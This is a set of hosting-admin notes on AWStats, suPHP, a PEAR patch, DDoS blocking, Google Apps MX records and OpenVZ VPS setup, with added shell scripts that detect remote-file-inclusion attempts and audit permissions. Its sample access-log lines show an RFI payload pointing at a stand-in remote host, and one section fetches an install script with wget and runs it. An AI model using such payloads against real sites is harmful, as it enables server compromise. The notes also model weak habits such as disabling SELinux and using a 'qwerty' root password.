Awstats outside cpanel

Download the Awstats.zip from http://totalchoicehosting.com/downloads/Awstats_Access.zip and unzip

Go to the stats subdirectory and edit the config.php file

Upload the stats directory to your web site, under public_html (creating public_html/stats)

Open a browser to http://www.yoursite.com/stats to log on and view your stats

How to find PHP injection through logs

URL Injection — attempt to inject / load files onto the server via PHP/CGI vulnerabilities

Sample log report including date and time stamp (1st field is “request”, 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker)

Request —– IP attacked —— IP of attacker

————————————————————————————————

Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:02 -0500] "GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" SesohkAx1jYAAFNIEg0 "-"

Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:03 -0500] "GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" Sesoh0Ax1jYAAFN@Eng "-"

————————————————————————————————
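
Detection logic for the pattern in the two log lines above, added here as an example and not part of the original notes: it flags requests where a query parameter value is itself an http, https or ftp URL pointing at a host other than the site being requested. The field layout is assumed from the sample; the function names and the log lines (documentation addresses, example domains) are constructed.

```shell
#!/bin/sh
# Added example: find requests that pass a remote URL as a query parameter value.
# Assumed layout (from the sample above): [Request:] vhost client-ip ident user
# [timestamp] "METHOD URI PROTO" status bytes ...

# Constructed sample log: documentation addresses and example domains.
sample_log() {
cat <<'EOF'
Request: shop.example.com 192.0.2.10 - - [19/Apr/2009:08:35:02 -0500] "GET /?custompluginfile[]=http://files.example.net/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0"
Request: shop.example.com 192.0.2.10 - - [19/Apr/2009:08:35:03 -0500] "GET /fanzine/?custompluginfile[]=http://files.example.net/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0"
Request: shop.example.com 198.51.100.7 - - [19/Apr/2009:08:36:10 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
Request: blog.example.org 203.0.113.5 - - [19/Apr/2009:08:37:44 -0500] "GET /view.php?inc=ftp%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
Request: blog.example.org 198.51.100.7 - - [19/Apr/2009:08:38:01 -0500] "GET /go.php?url=http://blog.example.org/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
}

# find_rfi [FILE...]: print "client-ip vhost path parameter remote-host"
# for every parameter whose value is an http(s)/ftp URL on another host.
find_rfi() {
    awk '
    {
        line = $0
        sub(/^Request: /, "", line)
        split(line, f, " ")
        vhost = f[1]; client = f[2]
        if (split(line, q, "\"") < 3) next     # no quoted request line
        split(q[2], req, " ")                  # METHOD URI PROTO
        uri = req[2]
        qpos = index(uri, "?")
        if (qpos == 0) next                    # no query string
        path = substr(uri, 1, qpos - 1)
        query = substr(uri, qpos + 1)
        # Undo the percent-encoding that would hide "://"
        gsub(/%3[Aa]/, ":", query)
        gsub(/%2[Ff]/, "/", query)
        n = split(query, param, "&")
        for (i = 1; i <= n; i++) {
            eq = index(param[i], "=")
            if (eq == 0) continue
            name = substr(param[i], 1, eq - 1)
            value = tolower(substr(param[i], eq + 1))
            if (value !~ "^(https?|ftp)://") continue
            host = value
            sub("^[a-z]+://", "", host)
            sub("[/?:#].*$", "", host)
            # A URL back to the same site is usually a redirect target
            if (host == tolower(vhost)) continue
            print client, vhost, path, name, host
        }
    }' "$@"
}

# rfi_sources [FILE...]: number of flagged requests per client, busiest first
rfi_sources() {
    find_rfi "$@" |
        awk '{ hits[$1]++ } END { for (ip in hits) print hits[ip], ip }' |
        sort -k1,1nr -k2,2
}

sample_log | rfi_sources
```

Pass a real access log as the argument instead of piping sample_log, for example rfi_sources /path/to/access_log.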

Suphp

Reference from https://support.apthost.com/

What is suPHP?
On most Apache servers, PHP runs as an Apache module. This is the default method of installation. Many hosts have this setup because it is the default, and they may not realize that it is also possible to configure PHP as a CGI. Running PHP as a CGI can be more secure whilst also avoiding file and directory ownership issues.

suPHP makes all scripts run under the relevant user account instead of under the web server's account. This allows server administrators to isolate and manage malicious or runaway scripts very quickly, so that unwanted or unauthorized scripts do not keep running for a lengthy period of time. AptHost uses suPHP on all shared, semi-dedicated and reseller hosting servers.

What does suPHP Do?
777 Permissions
In non-suPHP configurations, PHP runs as an Apache module and executes as the user/group of the webserver, which is usually “nobody”, “httpd” or “apache”. Under this mode, files or directories that your PHP scripts need to write to require 777 permissions (read/write/execute at user/group/world level). This is not very secure: besides allowing the webserver to write to the file, it also allows anyone else to read or write to the file.

Under suPHP configurations, PHP runs as a CGI with “suexec” enabled (su = switch user, allowing one user to “switch” to another if authorized), so your PHP scripts now execute under your own user/group. Files or directories that your PHP scripts need to write to no longer need 777 permissions. In fact, 777 permissions are no longer allowed: scripts that have 777 permissions, or that reside in directories with 777 permissions, will not run and will instead cause a “500 internal server error” when you attempt to execute them. This is done to protect you from someone abusing your scripts. Your scripts and directories can now have a maximum of 755 permissions (read/write/execute by you, read/execute by everyone else).

My script requires 777
So what about PHP scripts that say they require 777 permissions on some of their directories or files to work, such as Joomla!, forums, photo galleries and the like? Due to the transparent nature of suPHP this is solved very simply: any directories stated as requiring to be “writable” or “777” can safely be set to 755 (the maximum) instead. This is because, now that your scripts run under your own user account, only your own user account needs full write and execute permissions.

Goodbye “.htaccess” and Welcome “.ini”
Under the old Apache Module mode it was possible to manipulate the PHP settings from within a “.htaccess” file placed in the script’s top-level directory, this was also recursively applied to all other directories below it.

For example you could turn on the php setting “magic_quotes_gpc” with this line in .htaccess:

php_value magic_quotes_gpc on

Now, when PHP is running as a CGI and suPHP protected, manipulating the PHP settings is still possible however you can no longer make use of a “.htaccess” file. Using .htaccess with the required PHP prefix of “php_value” will cause a “500 internal server error” when attempting to access the scripts. This is due to php no longer running as an Apache module, thus Apache is unable to handle those directives any longer.

What is a php.ini file?
The php.ini file is a configuration file that the server looks at to see what PHP options have been made available to the server or what their settings are, if different from the server’s default php.ini. While the name may seem advanced to those unfamiliar with it, it is in essence a simple text file with the name php.ini.

How to create a php.ini file
To create a php.ini file, just open up a text editor, add in the lines you need and save the file. You can name the file whatever you wish when saving; to ensure the correct FTP transfer mode is used, you might wish to name it “php.ini.txt”. Once you have configured all your settings, upload the file to the directory where your script is located and then rename it back to php.ini.

For example you can turn on the php setting “magic_quotes_gpc” with this line in php.ini:

magic_quotes_gpc = on

In many cases, you might need multiple copies of the same php.ini file in different directories: unlike .htaccess files, php.ini files are not applied recursively to lower directories. If you need the same settings in lower directories as well, copy the php.ini file into each directory that has .php scripts running from within it.

MIMETypes:
If you added a Mimetype to the system in order to run html files as php scripts (AddType as .htaccess command), you will have to remove it and add an ApacheHandler instead. This is easy to do though. Just log into your control panel, then click on Apache Handlers and add the following:

Extension: html (or htm)
Handler: application/x-httpd-php

Protecting your php.ini file:
To protect your php.ini you should set its permissions to 600. Additionally you can add the following lines to your .htaccess file:

<Files *.ini>
Order deny,allow
Deny from All
</Files>

Troubleshooting, something went wrong
My php script doesn’t work or I have an error message.

1. Check that the php script that you are attempting to execute has permissions of no more than 755 – 644 will work just fine normally, this is not something that will need to be changed in most cases.

2. Check that the directory the script resides in has permissions of no more than 755. This also applies to any directories that the script needs to access.

3. Check that you do not have a .htaccess file with php_values within it. They will cause a 500 Internal server error, when attempting to execute the script.
The php_values will need to be removed from your .htaccess file and a php.ini put in its place, containing the php directives as explained above.
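
The three troubleshooting checks, plus the php.ini permission advice from the previous section, as one audit function. This is an added example and not part of the referenced AptHost text: the function names and the demo tree are constructed, and matching php_flag and the php_admin_ variants as well as php_value goes beyond the one directive the text names.

```shell
#!/bin/sh
# Added example: audit a document root against the suPHP rules described above.
#   WRITABLE  file or directory writable by group or others (more than 755)
#   HTACCESS  .htaccess that still carries mod_php directives
#   INI       php.ini whose mode is not exactly 600

suphp_audit() {
    dir=$1
    # Only regular files and directories: symlinks always show mode 777.
    find "$dir" \( -type f -o -type d \) \( -perm -0020 -o -perm -0002 \) -print |
        sed 's/^/WRITABLE /'
    find "$dir" -type f -name .htaccess -print | while IFS= read -r ht; do
        if grep -Eq '^[[:space:]]*php_(admin_)?(value|flag)[[:space:]]' "$ht"; then
            printf 'HTACCESS %s\n' "$ht"
        fi
    done
    find "$dir" -type f -name php.ini ! -perm 600 -print | sed 's/^/INI /'
}

# Constructed demo tree: one problem of each kind next to a clean counterpart.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/public_html/uploads" "$root/public_html/forum"
    printf '<?php echo "ok";\n' > "$root/public_html/index.php"
    printf 'php_value magic_quotes_gpc on\n' > "$root/public_html/.htaccess"
    printf '<Files *.ini>\nOrder deny,allow\nDeny from All\n</Files>\n' \
        > "$root/public_html/forum/.htaccess"
    printf 'magic_quotes_gpc = on\n' > "$root/public_html/php.ini"
    printf 'magic_quotes_gpc = on\n' > "$root/public_html/forum/php.ini"
    chmod 755 "$root" "$root/public_html" "$root/public_html/forum"
    chmod 777 "$root/public_html/uploads"
    chmod 644 "$root/public_html/index.php" "$root/public_html/.htaccess" \
        "$root/public_html/forum/.htaccess" "$root/public_html/php.ini"
    chmod 600 "$root/public_html/forum/php.ini"
    printf '%s\n' "$root"
}

demo=$(make_demo_tree)
suphp_audit "$demo"
rm -rf "$demo"
```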

Invalid tgz file : Cpanel PEAR Installer problem

The problem is caused by differences in the way PHP 5.2.x parses code, and can be fixed by manually patching the listContent function in PEAR’s Archive_Tar package.

The fix is to track down the /usr/local/lib/php/Archive/Tar.php and/or /usr/lib/php/Archive/Tar.php files and change the following removing the line marked ‘-‘ and adding the lines marked ‘+’…

Code:
    function listContent()
    {
        $v_list_detail = array();

        if ($this->_openRead()) {
+            $r = $this->_extractList('', $v_list_detail, "list", '', '');
+            if (!$r) {
-           if (!$this->_extractList('', $v_list_detail, "list", '', '')) {
                unset($v_list_detail);
                $v_list_detail = 0;
            }
            $this->_close();
        }

        return $v_list_detail;
    }
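
Review bot: in listContent() the new $r exists only to feed "if (!$r)", and nothing in the function records why the call to _extractList() was pulled out of the condition. Add a one-line comment above the assignment naming the PHP 5.2.x parsing problem, otherwise a later cleanup is likely to fold it back into "if (!$this->_extractList(...))". Since the change is made by hand in the installed Archive/Tar.php, it is also worth keeping it as a patch file so it can be reapplied if that file is replaced.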

Drop DDOS attack

1. Find which IP address on the server is targeted by the DDoS attack

netstat -plan | grep :80 | awk '{print $4}' | cut -d: -f1 | sort | uniq -c

2. Find which IPs the attack is coming from

netstat -plan | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c

3. Then find the TTL values of the attacking IP addresses

tcpdump -nn -vvv host xxxx | grep yyyy (xxxx = IP attacking and yyyy = IP being attacked)

Usually we need only tcpdump -nn -vvv host xxxx (as the attack is coming from numerous IPs)

4. Now block all the IPs matching the TTL value obtained from the above command

iptables -A INPUT -p tcp -s 0.0.0.0/0 -d yyyy -m ttl --ttl-eq=zzz -j DROP (zzz is the TTL value)

——————————————————————————————————————-

Install mod security and dos evasive

——————————————————————————————————————-

Harden the sysctl parameters (kernel params) to mitigate the current attack.

Increasing the backlog queue size and decreasing the backlog queuing time might help a bit.

——————————————————————————————————————-

Also install an open source script to prevent DDoS attacks to a certain extent.
http://deflate.medialayer.com/

MediaLayer was in need of a script to automatically mitigate (D)DoS attacks. The necessity started when MediaLayer was the target of a rather large, consistent attack originating from multiple IP addresses. Each IP would have a large amount of connections to the server, as shown as by:

netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

It became a general practice for us to be blocking IPs with a large amount of connections, but we wanted to get this automated. Zaf created a script to mitigate this kind of attack. We kept improving it to meet our own needs and eventually posted it on Defender Hosting’s Forum. (D)DoS-Deflate is now recognized as one of the best ways to block a (D)DoS attack at the software level.

License Agreement

You can view a copy of the license agreement here.

Installation

wget http://www.inetbase.com/scripts/ddos/install.sh
chmod 0700 install.sh
./install.sh

Uninstalling

wget http://www.inetbase.com/scripts/ddos/uninstall.ddos
chmod 0700 uninstall.ddos
./uninstall.ddos

Reference : http://deflate.medialayer.com/
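
The per-source counting used in steps 1 and 2 of the procedure above and in the (D)DoS-Deflate one-liner, written as an added example that is not part of the original notes or of the (D)DoS-Deflate script. It goes beyond the pipelines on the page by stripping the port from the right, so IPv6 and IPv4-mapped peers are counted under the correct address; the function names, the limit parameter and the sample netstat output (documentation addresses) are constructed.

```shell
#!/bin/sh
# Added example: per-source connection counts from netstat output.

# Constructed "netstat -ntu" output (documentation addresses).
sample_netstat() {
cat <<'EOF'
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 203.0.113.10:80         192.0.2.44:51234        SYN_RECV
tcp        0      0 203.0.113.10:80         192.0.2.44:51235        SYN_RECV
tcp        0      0 203.0.113.10:80         192.0.2.44:51236        ESTABLISHED
tcp        0      0 203.0.113.10:80         198.51.100.9:40022      ESTABLISHED
tcp        0      0 203.0.113.10:22         198.51.100.200:50111    ESTABLISHED
tcp6       0      0 ::ffff:203.0.113.10:80  ::ffff:192.0.2.44:51237 SYN_RECV
tcp6       0      0 2001:db8::10:80         2001:db8::beef:41000    ESTABLISHED
udp        0      0 203.0.113.10:53         198.51.100.9:33000
EOF
}

# The pipeline from the text, for comparison. cut -d: -f1 keeps only what
# precedes the first colon, so IPv6 and IPv4-mapped peers are miscounted.
naive_counts() {
    grep ':80' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c |
        awk '{print $1, $2}'
}

# conn_counts PORT: read netstat output on stdin, print "count source-ip"
# for connections to local port PORT, busiest source first.
conn_counts() {
    awk -v port="$1" '
    $1 ~ /^(tcp|udp)/ {
        laddr = $4; raddr = $5
        lport = laddr
        sub(/^.*:/, "", lport)          # the port is the last colon field
        if (lport != port) next
        sub(/:[0-9]+$/, "", raddr)      # drop the remote port
        sub(/^::ffff:/, "", raddr)      # IPv4-mapped IPv6 to plain IPv4
        count[raddr]++
    }
    END { for (ip in count) print count[ip], ip }' | sort -k1,1nr -k2,2
}

# over_limit PORT LIMIT: sources holding LIMIT or more connections to PORT
over_limit() {
    conn_counts "$1" | awk -v lim="$2" '$1 >= lim { print $2 }'
}

sample_netstat | conn_counts 80
```

On a live host, feed it with netstat -ntu | conn_counts 80 and review the list before acting on any address in it.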

Google apps

Create account for your domain in Google Apps
****************************************
First of all, create an account for your domain in Google Apps. Please follow the link given below for that.

http://google.com/a/

Changing Mx record for your domain
*****************************************

1. Sign in to your hosting account, and go to the MX record maintenance page.
2. MX records may be located in DNS Management, Mail Server Configuration, or Name Server Management. You may have to enable advanced settings to edit your MX records. Delete all existing MX entries.
3. Enter the following MX records.
You may not be able to enter the priority value exactly as it appears in the table below — if you can’t, make sure each record follows the indicated order. If you aren’t able to assign priorities, you should only enter aspmx.l.google.com.. Set any TTL values to 1 Hour (value=3600).

Priority     Mail Server
1            ASPMX.L.GOOGLE.COM.
5            ALT1.ASPMX.L.GOOGLE.COM.
5            ALT2.ASPMX.L.GOOGLE.COM.
10           ASPMX2.GOOGLEMAIL.COM.
10           ASPMX3.GOOGLEMAIL.COM.

Note: ASPMX.L.GOOGLE.COM is the top priority mail server. Don’t assign to any other servers. Be sure to include the trailing dot (.) at the end of any fully-qualified domain names (for example, server.example.com.) if your MX records require this format.

4. Save your changes. Your MX records are now configured to point to Google. Keep in mind that changes to MX records may take up to 48 hours to propagate throughout the Internet.

Adding Cname
*****************

To use the custom URL mail.<domain name> , you must change the CNAME record with your domain host.
Sign in to your domain hosting service.

Navigate to your DNS Management page. The location and name of this page will vary by host, but can generally be found in Domain Management or Advanced Settings.

Find the CNAME settings and enter the following as the CNAME value or alias:

mail

Set the CNAME destination to the following address:

ghs.google.com

Save changes with your domain host and click “I’ve completed these steps” below.

Verifying the accounts
************************
Verify your domain ownership

Google offers two methods of verification. You can either upload an HTML file with a name we specify, or you can change the CNAME record for your domain using the values we specify. Choose your preferred method below.

Once all these steps are done, you can access the webmail interface for your domain using any one of the methods given below.

http://google.com/a/<domain name>
http://mail.<domain name>

About VPS

1.1. What is VPS?

A virtual private server or virtual dedicated server (VPS or VDS) is a server run through virtualization. It is used to partition a single physical server into many isolated virtual private servers. Each virtual private server looks and behaves exactly like a real networked server system, complete with its own set of init scripts, users, processes, filesystems, etc. It fills the gap between shared hosting and dedicated hosting.
1.2. What is openvz?

OpenVZ is an operating system-level virtualization technology based on the Linux kernel and operating system. OpenVZ allows a physical server to run multiple isolated operating system instances, known as Virtual Private Servers (VPS) or Virtual Environments (VE).

OpenVZ offers the least flexibility in the choice of operating system: both the guest and host OS must be Linux (although Linux distributions can be different in different VEs). However, OpenVZ’s operating system-level virtualization provides better performance, scalability, density, dynamic resource management, and ease of administration than the alternatives.

The OpenVZ kernel is a modified Linux kernel which adds support for Virtual Environments (VE), so it is easy to create and configure a VPS using OpenVZ.
2. Requirements
2.1. Software Requirements

The Hardware Node should run either Red Hat Enterprise Linux 3 or 4, or Fedora Core 3 or 4, or CentOS 3.4 or 4. The detailed instructions on installing these operating systems for the best performance of OpenVZ are provided in the next sections.

This requirement does not restrict the ability of OpenVZ to provide other Linux versions as an operating system for Virtual Private Servers. The Linux distribution installed in a Virtual Private Server may differ from that of the host OS.
2.2. Hardware Requirements

The Hardware Node requirements for the standard 32-bit edition of OpenVZ are the following:
The computer should satisfy the Red Hat Enterprise Linux or Fedora Core hardware requirements.
i)IBM PC-compatible computer.
ii)CPUs: Intel Celeron, Pentium II, Pentium III, Pentium 4, Xeon, or AMD Athlon CPU. The more Virtual Private Servers you plan to run simultaneously, the more CPUs you need.
iii)Memory: At least 128 MB of RAM. The more memory you have, the more Virtual Private Servers you can run. The exact figure depends on the number and nature of applications you are planning to run in your Virtual Private Servers. However, on average, at least 1 GB of RAM is recommended for every 20-30 Virtual Private Servers.
iv)HDD: At least 4 GB of free disk space. Each Virtual Private Server occupies 400-600 MB of hard disk space for system files in addition to the user data inside the Virtual Private Server (for example, website content). You should consider this when planning disk partitioning and the number of Virtual Private Servers to run.
v)NIC: Intel EtherExpress100 (i82557-, i82558- or i82559-based), 3Com (3c905, 3c905B or 3c595) or RTL8139-based network cards are recommended.
A typical 2-way Dell PowerEdge 1650 1u-mountable server with 1 GB of RAM and 36 GB of hard drives is suitable for hosting 30 Virtual Private Servers.
3.Installation And Configuration
3.1. Pre-Setup

The first step before starting installation is to set up the openvz yum repository.

# cd /etc/yum.repos.d

# wget http://download.openvz.org/openvz.repo

# rpm --import http://download.openvz.org/RPM-GPG-Key-OpenVZ

# yum update

Now create a separate hard disk partition with at least 4 GB of space and mount it at /vz
3.2. Kernel Installation

You can install the kernel using yum, but that kernel will not always be a good fit.
So here you can compile an optimized kernel yourself.
Before compiling the kernel you may need to check the hardware installed in your server.

# cat /proc/cpuinfo

This will give you information about the processor.

# lspci

This will list the other main hardware installed in your system.
Now we can start to build the VPS kernel from source. So we need to download the kernel source.

# cd /usr/src

# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.16.tar.bz2

Now download the appropriate patch from OpenVZ.

# wget http://download.openvz.org/kernel/devel/026test018.1/patches/patch-026test018-combined.gz

The kernel configs are also available from openvz.

# wget http://download.openvz.org/kernel/devel/026test018.1/configs/kernel-2.6.16-026test018-i686-smp.config.ovz

Let us start the building…

# tar xvjf linux-2.6.16.tar.bz2

# cd linux-2.6.16

# mv ../patch-026test018-combined.gz .

# gzip -dc patch-026test018-combined.gz | patch -p1

# cp ../kernel-2.6.16-026test018-i686-smp.config.ovz .config

# make menuconfig

Now you can select the options depending on your server configuration.

# make all

# make modules_install

# make

# make install

Now the VPS host kernel has been compiled and installed. Next, configure the boot loader (either GRUB or LILO).
3.3. Boot Loader Configuration

If GRUB is used as the boot loader, it will be configured automatically. Lines similar to the following will be added to the grub.conf file.

# cat /boot/grub/grub.conf

Now you can find the following lines in grub.conf

title Fedora Core (2.6.16-026test018)
root (hd0,0)
kernel /vmlinuz-2.6.16-026test018 ro root=LABEL=/ rhgb quiet
initrd /initrd-2.6.16-026test018.img

Now edit this file as follows. (This is not necessary; it is just for clarity.)

# vi /boot/grub/grub.conf

title VPS-openvz(2.6.16-026test018)
root (hd0,0)
kernel /vmlinuz-2.6.16-026test018 ro root=LABEL=/ rhgb quiet panic=5
initrd /initrd-2.6.16-026test018.img

Now set the “default” value to the newly edited image (in most cases it will be ‘0’). Then save grub.conf. If you are installing on a remote server, please run the following in grub.

# grub --no-floppy

grub> savedefault --default=0 --once

grub> quit

Don’t reboot the system now. We need to configure some more files first.
3.4. Sysctl

We need to set the following in sysctl.conf for it to work properly

# vi /etc/sysctl.conf

Now add the following parameters.

net.ipv4.ip_forward = 1

net.ipv4.conf.default.proxy_arp = 0

net.ipv4.conf.all.rp_filter = 1

kernel.sysrq = 1

net.ipv4.conf.default.send_redirects = 1

net.ipv4.conf.all.send_redirects = 0

3.5. SELinux

SELinux should be disabled.

# vi /etc/sysconfig/selinux

Add the following line to this file.

SELINUX=disabled

3.6. Conntracks

In the stable OpenVZ kernels (those that are 2.6.8-based) netfilter connection tracking for VE0 is disabled by default. If you have a stateful firewall enabled on the host node you should either disable it, or enable connection tracking for VE0.

To enable conntracks for VE0 please edit the file /etc/modprobe.conf

# vi /etc/modprobe.conf

Now add the following.

options ip_conntrack ip_conntrack_enable_ve0=1

In kernels later than 2.6.8, connection tracking is enabled by default.
3.7. Rebooting Into VPS

Now reboot the server. If it is loaded successfully we can proceed to installing the user-level tools for OpenVZ
3.8. Install Utilities

Now we need to install three basic utility packages.
vzctl: used to perform different operations on the OpenVZ VPS (e.g. create, destroy, start, stop, set parameters etc.)
vzquota: used to manage the VPS quotas.
vzpkg: used to work with OpenVZ templates.
Let us install these packages as follows

# yum install vzctl

# yum install vzquota

# yum install vzpkg

Now check the virtual ethernet device

# ifconfig

If it is not there use the following command to make it up.

# ifconfig venet0 up

Now reboot the server

# reboot

3.9. Install OS Templates

Now you need to install at least one OS template.

# yum install vztmpl-fedora-core

You also need to download a template package for creating a VPS.

# cd /vz/template/cache/

# wget http://download.openvz.org/template/precreated/fedora-core-4-i386-default.tar.gz

4. Usages
4.1. Create VPS

First you need to select a vps id. The id 0 is used for the hardware node itself.

# vzlist -a

This command list all the vps in the host.

You can create a vps using the default template or you can define a template package and a configuration. The default creation is as follows,

# vzctl create 101

To create a VPS using an OS template, do as follows

# vzctl create 101 --ostemplate fedora-core-4 -i --config vps.basic

101: is the VPS ID
fedora-core-4: is the OS template
vps.basic: is the configuration defined in vps.basic.conf
4.2. Configure VPS

Now we need to configure our vps. In this process we need to set up the following parameters.
i) Set the startup parameters
ii) Set the network parameters
iii) Set the root(user) password
So do the following commands in the host server.

# vzctl stop 101

# vzctl set 101 --onboot yes --save

# vzctl set 101 --hostname cyborg.com --save

# vzctl set 101 --ipadd 192.168.1.169 --save

# vzctl set 101 --nameserver 192.168.1.9 --save

# vzctl set 101 --userpasswd root:qwerty

# vzctl start 101

Now our VPS will start automatically when the host boots. It also has the host name “cyborg.com” with IP 192.168.1.169 and nameserver 192.168.1.9. The root password was set to “qwerty”. Now do the following

# vzlist -a
      VEID      NPROC STATUS  IP_ADDR         HOSTNAME
         1         17 running 192.168.1.166   localhost
       101         31 running 192.168.1.169   cyborg.com

4.3. Start,Stop and Restart

Now you need to do the following operations in your vps
i) start
ii)stop
iii)restart
iv)status
So run the following commands.

# vzctl stop 101
# vzctl start 101
# vzctl restart 101
# vzctl status 101

In my server it shows the following output.

# vzctl stop 101
Stopping VE …
VE was stopped
VE is unmounted

# vzctl start 101
Starting VE …
VE is mounted
Adding IP address(es): 192.168.1.169
Setting CPU units: 1000
Set hostname: cyborg.com
File resolv.conf was modified
VE start in progress…

# vzctl restart 101
Restarting VE
Stopping VE …
VE was stopped
VE is unmounted
Starting VE …
VE is mounted
Adding IP address(es): 192.168.1.169
Setting CPU units: 1000
Set hostname: cyborg.com
File resolv.conf was modified
VE start in progress…

# vzctl status 101
VEID 101 exist mounted running

4.4. Delete VPS

To delete a vps node we use the “destroy” command.

# vzctl stop 101

# vzctl destroy 101

Now the VPS node 101 is deleted. You can check the status of this node. My server gives the following output on the status operation.

# vzctl status 101
VPS 101 deleted unmounted down

5. Commands & Tools
5.1. Running Commands In VPS

We can run commands in a VPS through the host using “exec”.

# vzctl exec 101 <command>

An example is given below.

# vzctl exec 101 ifconfig
lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

venet0    Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:127.0.0.1  P-t-P:127.0.0.1  Bcast:0.0.0.0  Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1
RX packets:27 errors:0 dropped:0 overruns:0 frame:0
TX packets:26 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3118 (3.0 KiB)  TX bytes:3720 (3.6 KiB)

venet0:0  Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:192.168.1.169  P-t-P:192.168.1.169  Bcast:192.168.1.169  Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1

5.2. OS Template Management

In this section we can see the list of cached and other templates.
To list the OS templates in the host please do the following commands.

# vzpkgls

To see the cached templates, do the following

# vzpkgls --cached

To see the template used by a vps do the following,

# vzpkgls 101

The above commands give the following results in my server.

# vzpkgls
fedora-core-4-i386-default
fedora-core-4-i386-minimal

# vzpkgls --cached
fedora-core-4-i386-default

# vzpkgls 101
fedora-core-4-i386-default

5.3. Operations in VPS

To update the VPS do the following

# vzyum 101 update

To install a package (eg: php) do the following.

# vzyum 101 install php

To install an rpm (e.g. MySQL-shared-3.23.57-1.i386.rpm) from the host, do it as follows

# vzrpm 101 -ihv MySQL-shared-3.23.57-1.i386.rpm

6. Resource Management

This section is the most important. The main goal of resource control in a VPS is to prevent a particular VPS from malicious or accidental usage of hardware resources.
6.1 Configuration Files

We can control the resources through a set of control parameters. All of these parameters are placed in the OpenVZ global configuration file or in the respective VPS configuration file.

The global configuration file is located at “/etc/sysconfig/vz” and the individual configuration file is located at “/etc/sysconfig/vz-scripts/VPSID.conf”
6.2 Disk Quota Management

A set of parameters determines disk quota in OpenVZ. The OpenVZ disk quota is realized on two levels: the per-VPS level and the per-user/group level. You can turn disk quota on or off on any level and configure its settings.
The main parameters are DISK_QUOTA, DISKSPACE, DISKINODES, QUOTATIME, QUOTAUGIDLIMIT.
DISK_QUOTA : Indicates whether first-level quotas are on or off for all VPSs or for a separate VPS. It is defined in the global configuration file (GF).

# grep DISK_QUOTA /etc/sysconfig/vz
DISK_QUOTA=yes

DISKSPACE : Total size of disk space the VPS may consume, in 1-Kb blocks. It is defined in the separate configuration file (SF).

# grep DISKSPACE /etc/sysconfig/vz-scripts/101.conf
DISKSPACE="2000000:2200000"

DISKINODES : Total number of disk inodes (files, directories, and symbolic links) the Virtual Private Server can allocate. It is defined in the separate configuration file (SF).

# grep DISKINODES /etc/sysconfig/vz-scripts/101.conf
DISKINODES="200000:220000"

QUOTATIME : The grace period for the disk quota overusage, defined in seconds. The Virtual Private Server is allowed to temporarily exceed its quota soft limits for no more than the QUOTATIME period. It is defined in SF.

# grep QUOTATIME /etc/sysconfig/vz-scripts/101.conf
QUOTATIME="0"

QUOTAUGIDLIMIT : Number of user/group IDs allowed for the VPS internal disk quota. If set to 0, the UID/GID quota will not be enabled. It is defined in SF.
Turning on/off per-VPS disk quota: to turn on the per-VPS disk quota, do the following.
Edit the separate configuration file

# vi /etc/sysconfig/vz-scripts/101.conf

Add the following,

DISK_QUOTA=yes

If you set the above value to “no”, the quota will be off.

# vzctl restart 101

# vzctl exec 101 df -h

Set up per-VPS disk quota: to set up the per-VPS disk quota (e.g. for node 102) we need to set the following parameters: DISKSPACE, DISKINODES, QUOTATIME

# vzctl set 102 --diskspace 1000000:1100000 --save

# vzctl set 102 --diskinodes 90000:91000 --save

# vzctl set 102 --quotatime 600 --save

#  vzctl restart 102

#  vzctl exec 102 df -h

Turning On/Off Second-Level Quotas for Virtual Private Server:The parameter that controls the second-level disk quotas is QUOTAUGIDLIMIT in the VPS configuration file. By default, the value of this parameter is zero and this corresponds to disabled per-user/group quotas.

Enabling per-user/group quotas for a Virtual Private Server requires restarting the VPS. The value for it should be carefully chosen; the bigger value you set, the bigger kernel memory overhead this Virtual Private Server creates. This value must be greater than or equal to the number of entries in the VPS /etc/passwd and /etc/group files.

# cat /etc/passwd|wc -l
55
# cat /etc/group|wc -l
66
# vzctl set 102 --quotaugidlimit 100 --save
# vzctl restart 102

Setting Up Second-Level Disk Quota Parameters: first check that the required packages are present in the VPS.

# vzctl exec 102 rpm -q quota

Then ssh to the node 102
Now to edit the quota for the root do the following,

# edquota root

To report the quota do the following,

# repquota -a

This command gives the following output in my test vps.

# repquota -a
*** Report for user quotas on device /dev/simfs
Block grace time: 00:00; Inode grace time: 00:00
                        Block limits                File limits
User            used    soft    hard  grace    used  soft  hard  grace
----------------------------------------------------------------------
root      --  455028       0       0          19878     0     0
smmsp     --       8       0       0              2     0     0
named     --      40       0       0             10     0     0
apache    --       8       0       0              2     0     0
rpm       --    9472       0       0             75     0     0
mysql     --    1332       0       0            163     0     0

